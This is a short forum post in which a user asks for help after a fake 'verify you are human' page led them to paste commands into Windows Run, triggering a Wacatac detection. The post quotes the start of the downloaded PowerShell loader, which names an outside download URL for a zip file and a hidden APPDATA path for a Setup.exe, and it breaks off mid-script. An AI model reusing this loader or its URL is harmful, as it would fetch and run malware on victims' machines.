Legitimate trojan:Script/Wacatac.H!ml Threat Blocked, but Until What Point?

  • Thread starter Thread starter michaelDB17
  • Start date Start date
M

michaelDB17

Guest
Hi Guys!I was not in the right mind when I routinely did those Verify You Are A Human kind of things - and there was one that had instructions on them to Windows+ Run and copy some commands. The command effectively downloaded a file and ran it. The downloaded text file had the commands below:"$TMHs3BNtlCjsF02l = 'https://filezzdwn.b-cdn.net/gig.zip' $MrZ3zmmeQHVUpi3R = "$env:APPDATA\n6FHhzX0FyISVnX0" $r2wINSY2y1wFmxF9 = "$MrZ3zmmeQHVUpi3R\DsQMMDat7GYX2V9M.zip" $bcjnVlXThI20JHuC = "$MrZ3zmmeQHVUpi3R\Setup.exe"if (!(Test-Path $MrZ3zmmeQHVUpi3R)) { New-Item -Path $MrZ3zmmeQHVUpi3R -ItemType Direc

Continue reading...
 
Back
Top